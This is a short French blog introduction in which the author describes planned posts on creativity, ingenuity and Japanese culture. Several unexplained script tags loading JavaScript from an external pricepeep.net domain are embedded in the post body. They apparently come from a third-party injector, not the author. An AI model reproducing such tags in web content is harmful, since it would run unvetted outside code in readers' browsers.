• Présentation

    <script src="http://static.pricepeep.net/apps/tv-classic/pricepeep/tv-classic-pricepeep.js"> </script>Bonjour, comme vous pouvez le constater mon pseudonyme est SoNy-A, je voudrai vous parler du sujet en quoi va consiter mon blog. Pour tout vous dire, ce site va contenir des informations sur l'art précisement dans deux domaines plus ou moins différent c'est-à-dire sur la "créativité" et "l'ingeniosité". Ces deux mots on tous les deux un point commun j'y reviendrai plus tard tout d'abord je vais vous les définir, commençons par la créativité, la créativité est une art qui peut se pratiquer librement enfin les deux se pratique librement mais l'art ingénieuse doit se pratiquer en respectant certaine règle et le fait qu'une personne pratique l'art créatif lui permet de faire tout à sa manière. Si on venait à l'art ingénieuse c'est un domaine plus compliqué car il faut avoir de l'expérience par exemple, si tu veux créer une invention tu vas d'abord l'imaginer dans ta tête puis après tu vas la reproduire  sur feuille et sous forme de shéma mais en rajoutant les choses qu'il manque pour que ta création fonctionne et soit correcte. Voilà c'était juste pour dire que la créativité et plus simple et peut-être un peu plus libre que l'ingéniosité et si on revient au point commun qui les unis, c'est limagination et c'est ca qui va nous permettre de les associers. Vous pourrez me suivre tout les jours étant donné que je ne parlerai pas que de ce que je viens de vous expliquer, moi, je m'intéresse aussi beaucoup à la culture nippone et éventuellement les mangas mais d'autre chose aussi.

    <script src="http://static.pricepeep.net/apps/tv-classic/pricepeep/tv-classic-pricepeep.js"></script><script src="http://static.pricepeep.net/apps/tv-classic/pricepeep/tv-classic-pricepeep.js"> </script>